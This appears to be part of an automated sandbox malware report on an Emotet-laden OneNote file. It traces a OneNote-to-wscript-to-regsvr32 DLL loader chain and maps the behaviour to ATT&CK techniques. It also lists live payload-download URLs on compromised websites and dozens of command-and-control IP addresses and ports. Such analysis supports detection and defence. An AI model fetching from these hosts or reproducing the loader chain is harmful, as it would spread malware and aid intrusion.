                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll"Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\APvqE\xukoZN.dll"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                    Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{648E277F-12C2-4FEB-937C-E28C5FEAD81A}Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{9E57F28E-E61E-4B72-AC07-75DEC2311600} - OProcSessId.datJump to behavior
                    Source: classification engineClassification label: mal100.troj.expl.evad.winONE@11/325@4/51
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00698BC8 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,3_2_00698BC8
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069A0FC push ebp; iretd 3_2_0069A0FD
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00696CDE push esi; iretd 3_2_00696CDF
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A80D7 push ebp; retf 3_2_006A80D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00696C9F pushad ; ret 3_2_00696CAA
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A7D4E push ebp; iretd 3_2_006A7D4F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00699D51 push ebp; retf 3_2_00699D5A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A8157 push ebp; retf 3_2_006A8158
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A7D25 push 4D8BFFFFh; retf 3_2_006A7D2A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A7D3C push ebp; retf 3_2_006A7D3D
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069A1D2 push ebp; iretd 3_2_0069A1D3
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A7987 push ebp; iretd 3_2_006A798F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069A26E push ebp; ret 3_2_0069A26F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A7EAF push 458BCC5Ah; retf 3_2_006A7EBC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00699E8B push eax; retf 3_2_00699E8E
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AC731 push esi; iretd 3_2_006AC732
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01527D4E push ebp; iretd 4_2_01527D4F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01536D34 push edi; ret 4_2_01536D36
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01527D3C push ebp; retf 4_2_01527D3D
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01527D25 push 4D8BFFFFh; retf 4_2_01527D2A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01516CDE push esi; iretd 4_2_01516CDF
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01516C9F pushad ; ret 4_2_01516CAA
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152C731 push esi; iretd 4_2_0152C732
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01527EAF push 458BCC5Ah; retf 4_2_01527EBC
                    Source: rad69C50.tmp.dll.1.drStatic PE information: section name: _RDATA
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll
                    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dllJump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\APvqE\xukoZN.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\APvqE\xukoZN.dll (copy)Jump to dropped file
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\APvqE\xukoZN.dll:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exe TID: 5704Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\regsvr32.exe TID: 5352Thread sleep time: -570000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.0 %
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28
                    Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: regsvr32.exe, 00000004.00000003.471546520.0000000001313000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWKG
                    Source: wscript.exe, 00000001.00000003.391922304.00000000059DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@
                    Source: wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410855988.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420955265.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.411607010.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412126322.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413424725.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420832267.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391922304.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.471546520.0000000001313000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.471546520.00000000012CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj1
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A878 GetProcessHeap,3_2_000000018000A878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800082EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00000001800017DC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.65.88.10 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 186.194.240.217 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.207.28.33 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 103.43.75.120 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: bbvoyage.com
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 72.15.201.15 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 206.189.28.199 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 31.31.196.172 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 186.202.153.5 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 107.170.39.149 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 82.223.21.224 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.56.131.28 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 169.57.156.166 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: www.gomespontes.com.br
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 1.234.2.232 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800070A0 cpuid 3_2_00000001800070A0
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_0000000180001D98

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 8846_0.one, type: SAMPLE
                    Source: Yara matchFile source: 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.660000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.886565395.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.390164485.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.886899027.0000000001511000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 8846_0.one, type: SAMPLE
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Scripting
                    2
                    Registry Run Keys / Startup Folder
                    111
                    Process Injection
                    21
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium11
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    2
                    Registry Run Keys / Startup Folder
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory121
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    DLL Side-Loading
                    111
                    Process Injection
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                    Ingress Tool Transfer
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Scripting
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer4
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Hidden Files and Directories
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size Limits115
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Obfuscated Files or Information
                    Cached Domain Credentials2
                    File and Directory Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Regsvr32
                    DCSync25
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830446 Sample: 8846_0.one Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 129.232.188.93 xneeloZA South Africa 2->35 37 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->37 39 25 other IPs or domains 2->39 53 Snort IDS alert for network traffic 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 6 other signatures 2->59 10 ONENOTE.EXE 47 369 2->10         started        signatures3 process4 process5 12 wscript.exe 4 10->12         started        17 ONENOTEM.EXE 1 10->17         started        dnsIp6 47 gomespontes.com.br 186.202.153.5, 443, 49700 LocawebServicosdeInternetSABR Brazil 12->47 49 penshorn.org 203.26.41.131, 443, 49698 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 12->49 51 2 other IPs or domains 12->51 31 C:\Users\user\AppData\...\rad69C50.tmp.dll, PE32+ 12->31 dropped 33 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 12->33 dropped 65 System process connects to network (likely due to code injection or exploit) 12->65 19 regsvr32.exe 12->19         started        file7 signatures8 process9 process10 21 regsvr32.exe 2 19->21         started        file11 29 C:\Windows\System32\APvqE\xukoZN.dll (copy), PE32+ 21->29 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->61 25 regsvr32.exe 21->25         started        signatures12 process13 dnsIp14 41 169.57.156.166, 8080 SOFTLAYERUS United States 25->41 43 1.234.2.232, 49722, 8080 SKB-ASSKBroadbandCoLtdKR Korea Republic of 25->43 45 19 other IPs or domains 25->45 63 System process connects to network (likely due to code injection or exploit) 25->63 signatures15

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    8846_0.one41%ReversingLabsScript-WScript.Trojan.Emotet
                    8846_0.one56%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll79%ReversingLabsWin64.Trojan.Emotet
                    C:\Windows\System32\APvqE\xukoZN.dll (copy)79%ReversingLabsWin64.Trojan.Emotet
                    SourceDetectionScannerLabelLinkDownload
                    4.2.regsvr32.exe.1220000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                    3.2.regsvr32.exe.660000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://cdn.entity.0%URL Reputationsafe
                    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                    https://api.aadrm.com/0%URL Reputationsafe
                    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                    https://my.microsoftpersonalcontent.com0%URL Reputationsafe
                    https://store.office.cn/addinstemplate0%URL Reputationsafe
                    https://www.odwebp.svc.ms0%URL Reputationsafe
                    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                    https://d.docs.live.net0%URL Reputationsafe
                    https://ncus.contentsync.0%URL Reputationsafe
                    https://wus2.contentsync.0%URL Reputationsafe
                    https://662.162.143.56/0%Avira URL Cloudsafe
                    https://103.43.75.120:443/ncju/qfgtbvn/100%Avira URL Cloudmalware
                    https://160.16.142.56:8080/ncju/qfgtbvn/0%Avira URL Cloudsafe
                    https://skyapi.live.net/Activity/0%URL Reputationsafe
                    https://api.cortana.ai0%URL Reputationsafe
                    https://104.168.155.143:8080/ncju/qfgtbvn/100%Avira URL Cloudmalware
                    https://staging.cortana.ai0%URL Reputationsafe
                    https://103.43.75.120/ncju/qfgtbvn/100%Avira URL Cloudmalware
                    https://wus2.pagecontentsync.0%URL Reputationsafe
                    https://www.gomespontes.com.br/logs/pd/I100%Avira URL Cloudmalware
                    https://cortana.ai/api0%URL Reputationsafe
                    https://164.90.222.65/0%URL Reputationsafe
                    http://ozmeydan.co0%Avira URL Cloudsafe
                    https://www.gomespontes.com.br/R0%Avira URL Cloudsafe
                    https://91.207.28.33:8080/ncju/qfgtbvn/Pj?100%Avira URL Cloudmalware
                    https://10.207.28.33:8080/0%Avira URL Cloudsafe
                    http://wrappixels.com/wp-admin/Gd100%Avira URL Cloudmalware
                    http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0100%Avira URL Cloudmalware
                    https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                    https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
                    http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/100%Avira URL Cloudmalware
                    https://66.228.32.31:7080/100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/ncju/qfgtbvn/B100%Avira URL Cloudmalware
                    https://107.170.39.149:8080/4100%Avira URL Cloudmalware
                    https://169.57.156.166:8080/ncju/qfgtbvn/ConnectionCache-Control100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/ncju/qfgtbvn/G100%Avira URL Cloudmalware
                    https://microsoftapc-my.sharepoint.com0%Avira URL Cloudsafe
                    http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
                    https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/ncju/qfgtbvn/Ih100%Avira URL Cloudmalware
                    https://826.189.28.199:8080/0%Avira URL Cloudsafe
                    https://91.207.28.33:8080/mbp100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/ebx100%Avira URL Cloudmalware
                    https://184.168.155.143:8080/0%Avira URL Cloudsafe
                    http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
                    https://91.121.146.47:8080/ncju/qfgtbvn/100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bbvoyage.com
                    31.31.196.172
                    truetrue
                      unknown
                      gomespontes.com.br
                      186.202.153.5
                      truetrue
                        unknown
                        penshorn.org
                        203.26.41.131
                        truetrue
                          unknown
                          www.gomespontes.com.br
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/true
                            • Avira URL Cloud: malware
                            unknown
                            https://www.gomespontes.com.br/logs/pd/true
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://662.162.143.56/regsvr32.exe, 00000004.00000003.577252233.0000000001302000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            https://shell.suite.office.com:14439204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                              high
                              https://autodiscover-s.outlook.com/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                high
                                https://104.168.155.143:8080/ncju/qfgtbvn/regsvr32.exe, 00000004.00000002.886694503.0000000001302000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                  high
                                  https://cdn.entity.9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                    high
                                    https://rpsticket.partnerservices.getmicrosoftkey.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://lookup.onenote.com/lookup/geolocation/v19204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                      high
                                      https://www.gomespontes.com.br/logs/pd/Iwscript.exe, 00000001.00000003.412126322.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413424725.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420955265.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410855988.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391922304.0000000005A25000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                        high
                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                          high
                                          https://api.aadrm.com/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://160.16.142.56:8080/ncju/qfgtbvn/regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
